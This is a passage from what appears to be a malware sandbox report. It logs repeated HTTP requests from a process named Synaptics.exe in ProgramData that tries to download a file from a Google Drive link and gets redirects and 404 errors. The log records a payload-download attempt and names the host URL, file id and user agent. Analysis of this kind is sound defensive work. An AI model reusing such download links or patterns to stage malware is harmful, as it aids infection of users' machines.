                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:45 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ge6vNa-X5qq1s72LBsnZTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            28192.168.2.949900216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:46 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:47 UTC1242INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4ygYu82zC6obV2S2DYWnux_uAmtqMldNyUUubAJgmQ5J715FfIc2a2f3FbVjv2EKg
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Be2qfYJvuWOeXiKZwBzKzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:47 UTC148INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                            2025-01-02 19:29:47 UTC1390INData Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 75 34 77 30 6d 4a 30 53 56 4a 4f 4f 72 73 49 79 33 4d 57 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a
                                                                                            Data Ascii: Found)!!1</title><style nonce="pu4w0mJ0SVJOOrsIy3MWxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                            2025-01-02 19:29:47 UTC114INData Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.949903216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:46 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7pq1dpBb_fa2D5EzVrDu9ZveZfW3d9tPeBedSfsnqUB99CAj65tplMkp56UW6l0dSp
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-T99BGiUP7RhfuJ2hfh_iHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 62 7a 65 7a 35 66 7a 55 36 65 74 56 30 58 51 6e 70 4e 76 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="Hbzez5fzU6etV0XQnpNvcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.949902172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:46 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:46 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-CFZbEpC5CKH1YjIcQH1Myg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            31192.168.2.949901172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:46 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:47 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:46 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lj8rnv9oGDdXgMZBC923Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.949910172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:48 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:47 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-mlJv8oSRDJdVa0DmFjjiEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.949911216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:48 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7mxnI5ydwAYFyere2_4MlGs8Wqb9AOQZs4BJasRe8jFiqmKw38uEoUi6ilvhBZev6O
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:47 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bKALfDcY-nvlGkO6-JPvlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:48 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:48 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 32 50 57 6f 63 63 46 45 39 50 57 51 68 56 59 4e 44 46 53 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="j2PWoccFE9PWQhVYNDFSDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:48 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.949912172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:48 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:47 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9ahqteiRoqA_ctTpaWHDuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.949913216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:48 UTC1242INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6s4gOR73lQMY2UndEO6c0xQrqXONE8Lc_0F69l_x-_MO_Wc5iRYxGwA9J1pm7Of8g
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:48 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Hx8qXg4mYyKF8vjSsz-mFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
